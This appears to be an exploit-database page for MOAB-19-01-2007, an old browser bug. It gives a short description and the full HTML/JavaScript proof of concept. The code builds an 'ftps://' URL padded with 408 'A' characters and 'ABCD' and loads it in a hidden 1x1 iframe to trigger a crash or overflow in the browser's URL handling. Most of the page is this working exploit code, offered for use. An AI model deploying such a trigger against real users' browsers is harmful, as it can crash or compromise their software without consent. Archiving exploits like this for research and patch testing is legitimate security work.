header-logo
Suggest Exploit
vendor:
by:
Unknown
N/A
CVSS
N/A
Unknown
Unknown
CWE
Product Name:
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

MOAB-19-01-2007

This exploit is a JavaScript code that creates an iframe with a source URL that starts with 'ftps://' followed by a string of 408 'A' characters and 'ABCD'. It appends the iframe to a hidden div element with the id 'testbox'. When the 'Test MOAB-19-01-2007' button is clicked, the payload size is displayed in an alert and the iframe is loaded.

Mitigation:

Unknown
Source

Exploit-DB raw data:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
	"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html>
	<head>
		<title>MOAB-19-01-2007</title>
		<script>
			function boom() {
			    var recipient = document.getElementById('testbox');
				var str = '';
				for (var i = 0; i < 408; i++) {
				    str = str + 'A'
				}
				str = str + 'ABCD';
				
				alert('Payload size: ' + str.length);
				
				str = "ftps://" + str;
				ftarget = document.createElement('iframe');
				ftarget.src = str;
				ftarget.width = 1;
				ftarget.height = 1;
				recipient.appendChild(ftarget);
			}
		</script>
	</head>
	<body>
	    <div id="testbox" style="display: none;"></div>
		<input type="button" onclick="boom();" value="Test MOAB-19-01-2007" />

	</body>
</html>

# milw0rm.com [2007-01-20]